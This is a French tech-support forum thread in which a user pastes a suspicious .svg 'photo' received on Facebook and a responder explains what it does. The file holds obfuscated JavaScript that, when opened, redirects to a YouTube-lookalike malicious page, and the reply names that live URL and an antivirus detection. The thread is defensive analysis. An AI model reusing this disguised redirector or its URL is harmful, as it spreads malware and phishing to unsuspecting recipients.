Script java recu sur Facebook !
Résolu
BuddyLove_x52
Messages postés
131
Statut
Membre
-
BuddyLove_x52 Messages postés 131 Statut Membre -
BuddyLove_x52 Messages postés 131 Statut Membre -
Salut tout le monde, j'ai une question !
On m'as envoyé un script sur Facebook ce faisant passé pour une photos. Etant donné que je connais un peut l'informatique j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg j'ai donc ouvert avec Notepad et je suis tomber sur ce script :
Quelqu'un peut-il me dire ce qu'il exécute ? Merci ! :)
On m'as envoyé un script sur Facebook ce faisant passé pour une photos. Etant donné que je connais un peut l'informatique j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg j'ai donc ouvert avec Notepad et je suis tomber sur ce script :
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"[http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22>
<svg http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg] version="1.1" xmlns="[http://www.w3.org/2000/svg%22> http://www.w3.org/2000/svg">] <circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function jzaehxu(lslzqi,dszrj,ztmdf){
var zdvsmv = "./JHU_SrnVmFZxljy8:d2Y=k3h?CcMbfoaED65zIONK7gPTpLusXBvt0iAR94G1e";
var rcqlrb = ["OH\/kPZRAU0z3u=heGcELI4B:67TNgtCK58noXS.jmlFy?VvprDbJ1i9_YfaxMd2s",".LKoClD2zOV0xrHkgIhymN?pP1neEGa7:fut_cd\/6SXF=4R9TUMJ5A3bjvZYi8sB","g\/6XIbuf=15eGPvKHF_9saixjC?2rZL:zyJAt0Vhc3OmN.k84Bpn7RoEMDUTdlYS","ko_A1LE6KNS903Te.JbuV27\/pHljYxdZX4RtgmiM8PDc?zvBaIFyns5fh:GCU=Or","XH7x3bYcCiD5g8E.pGeUIavmRZ6VBOkL9KyrS\/=MTJd_1ton0:PjFuN4zA2sf?lh","4M2z_U:eSiJIxP16avjmkL=.s3tlZbDp\/V5?FEO09dgHTfrXBoKGAy7CcRYunhN8","oYui.a3VAcSF5Ed4pt:6nKOR\/e?_HfUN7sbMr9lXLCx8PyIhg0=ZJTG1Bjz2Dkvm","fo:gyRJVjh=eU_sBXZaSTPD5EtA8L\/0m2G1cIF64xvn7r9pYNbl?.3MKzuiHdOkC","verIn5GYVdoK1HA96\/hazRp7:cELUub02PDMTCJ4xOmNgBF3_y8.i=Xsftk?jZSl"];
var dbtli = "";
var dhonon = 0;
while(rcqlrb[dhonon]){
dhonon++;
}
var ucscy = 0;
while(lslzqi[ucscy]){
var stoum = 0;
var mrdfz = -1;
while(zdvsmv[stoum]){
if(zdvsmv[stoum] == lslzqi[ucscy]){
mrdfz = stoum;
break;
}
stoum++;
}
if(mrdfz >= 0){
var wdmdam = 0;
var vadtty = -1;
while(rcqlrb[ucscy%dhonon][wdmdam]){
if(rcqlrb[ucscy%dhonon][wdmdam] == lslzqi[ucscy]){
vadtty = wdmdam;
break;
}
wdmdam++;
}
dbtli += zdvsmv[vadtty];
}else{
dbtli += lslzqi[ucscy];
}
ucscy++;
}
var mhmisv = "";
for(acaod=dszrj;acaod<dbtli.length;acaod++){
mhmisv += dbtli[acaod];
}
dbtli = mhmisv;
return dbtli;
}
var opree = window;
var lukdy = jzaehxu("wwLicJs_Ai1R59X",12,false);
var jjwun = jzaehxu("p1=3w17LP9jzK",5,false);
var vsyhb = jzaehxu("w15/c/Vzc72SZ",9,false);
opree[lukdy][jjwun][vsyhb] = jzaehxu("sHSs88eMXph/oc/Gb8sASiK4BMyp.8wHXeYe92BFN4ht3",6,true);
]]></script>
</svg>
Quelqu'un peut-il me dire ce qu'il exécute ? Merci ! :)
A voir également:
- Script java recu sur Facebook !
- Jeux java itel - Télécharger - Jeux vidéo
- Waptrick java football - Télécharger - Jeux vidéo
- Waptrick java voiture - Télécharger - Jeux vidéo
- Story facebook comment ça marche - Guide
- Java apk - Télécharger - Langages
1 réponse
Bonjour,
"j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg"
Pourtant SVG est bien un format image valide : Scalable Vector Graphics
"j'ai donc ouvert avec Notepad et je suis tomber sur ce script"
Effectivement, SVG est un format qui peut se lire (et s'écrire) textuellement au format XML, ce qui ressemble bien à ce que tu nous montres. Et peux aussi exécuter du JavaScript lorsqu'il est lancé dans une page web.
Ton fichier est donc bien une image SVG tout à fait valide, qui dessine un rond rouge... En revanche, lorsque la partie JavaScript est exécutée ça redirige vers une page web, qui ressemble à YouTube (où je déconseillerais de trop s'attarder) http://orezupe.hav.pw/ucirepego.html
Plus d'info sur la manière dont fonctionne SVG, y compris sur sa partie JavaScript (qui n'a rien à voir avec Java) : https://www.alsacreations.com/tuto/lire/1421-svg-initiation-syntaxe-outils.html
La confiance n'exclut pas le contrôle
"j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg"
Pourtant SVG est bien un format image valide : Scalable Vector Graphics
"j'ai donc ouvert avec Notepad et je suis tomber sur ce script"
Effectivement, SVG est un format qui peut se lire (et s'écrire) textuellement au format XML, ce qui ressemble bien à ce que tu nous montres. Et peux aussi exécuter du JavaScript lorsqu'il est lancé dans une page web.
Ton fichier est donc bien une image SVG tout à fait valide, qui dessine un rond rouge... En revanche, lorsque la partie JavaScript est exécutée ça redirige vers une page web, qui ressemble à YouTube (où je déconseillerais de trop s'attarder) http://orezupe.hav.pw/ucirepego.html
Plus d'info sur la manière dont fonctionne SVG, y compris sur sa partie JavaScript (qui n'a rien à voir avec Java) : https://www.alsacreations.com/tuto/lire/1421-svg-initiation-syntaxe-outils.html
La confiance n'exclut pas le contrôle
Je reviens avec cet article d'information :
https://www.lci.fr/high-tech/un-nouveau-virus-locky-se-propage-sur-facebook-messenger-et-linkedin-voici-comment-eviter-de-vous-faire-pieger-2013860.html
Remarque : mon antivirus a été capable de repérer ce fichier comme dangereux et l'a placé en quarantaine (HTML/ExpKit.Gen2)
NB. je déplace ta discussion dans le forum Virus/Sécurité.